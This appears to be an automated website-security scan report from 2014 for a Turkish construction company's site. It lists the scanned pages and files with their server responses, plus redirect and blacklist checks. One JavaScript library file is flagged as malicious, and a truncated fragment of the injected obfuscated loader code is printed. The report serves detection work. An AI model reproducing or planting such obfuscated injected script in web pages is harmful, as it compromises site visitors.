Scanned pages/files
Request | Server response | Status |
http://reisinsaat.com.tr/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 22:58:26 GMT Accept-Ranges: bytes ETag: "6e4bc564588ce1:121a6" Server: Microsoft-IIS/6.0 Content-Length: 22734 Content-Location: http://reisinsaat.com.tr/Index.html Content-Type: text/html Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | clean |
http://reisinsaat.com.tr/index.html | 200 OK Content-Length: 22734 Content-Type: text/html | clean |
http://reisinsaat.com.tr/jscookmenu.min.js | 200 OK Content-Length: 19311 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/images/sly1.jpg | 200 OK Content-Length: 280242 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://reisinsaat.com.tr/images/sly2.jpg | 200 OK Content-Length: 282957 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./Ic-Dekorasyon.html | 200 OK Content-Length: 17998 Content-Type: text/html | clean |
http://reisinsaat.com.tr/./jscookmenu.min.js | 200 OK Content-Length: 19311 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/./jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/./slimbox/js/slimbox2.js | 200 OK Content-Length: 8603 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=1
Antivirus reports:
http://reisinsaat.com.tr/./images/dekore1.jpg | 200 OK Content-Length: 122337 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore4.jpg | 200 OK Content-Length: 169994 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore5.jpg | 200 OK Content-Length: 217497 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore7.jpg | 200 OK Content-Length: 152974 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore8.jpg | 200 OK Content-Length: 300419 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: reisinsaat.com.tr
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 22:58:26 GMT
Accept-Ranges: bytes
ETag: "6e4bc564588ce1:121a6"
Server: Microsoft-IIS/6.0
Content-Length: 22734
Content-Location: http://reisinsaat.com.tr/Index.html
Content-Type: text/html
Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...22734 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: reisinsaat.com.tr
Referer: http://www.google.com/search?q=reisinsaat.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=reisinsaat.com.tr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://reisinsaat.com.tr/
Result: reisinsaat.com.tr is not infected or malware details are not published yet.